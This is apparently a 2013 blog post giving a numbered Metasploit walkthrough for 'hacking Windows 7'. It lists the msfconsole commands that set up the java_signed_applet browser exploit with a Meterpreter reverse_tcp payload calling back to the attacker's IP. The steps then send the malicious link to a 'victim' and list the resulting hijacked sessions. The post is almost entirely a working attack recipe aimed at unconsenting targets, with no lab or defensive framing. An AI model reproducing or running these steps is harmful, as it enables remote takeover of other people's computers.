sabato 1 giugno 2013

Hacking windows 7 using metasploit

Things you will need ---->

1. Backtrack OS or Metsaploit.
2. A victim
3. Brain(important thing lol)

Lets start the shit ---->

1. Open terminal, type msfconsole and hit enter. Metsaploit will open like in image.

2. Now type use exploit/multi/browser/java_signed_applet and hit enter.

3. Type set payload windows/meterpreter/reverse_tcp and hit enter.

4. Type set lhost 223.185.18.74 (must change 223.185.18.74 with your ip address)

5. Now type set lport 443 and hit enter.

6. Now type set srvport 80 and hit enter.

7. Now type set uripath cybersucks and hit enter.(you may change cybersucks to your disired one)

8. At last type exploit and hit enter. See image below

9. Now send http://youripaddress:80/cybersucks to your victim.

10. Now when victim will open it he/she will be hacked.

11. Now see hacked sessions by typing sessions -l 

Nessun commento:

Posta un commento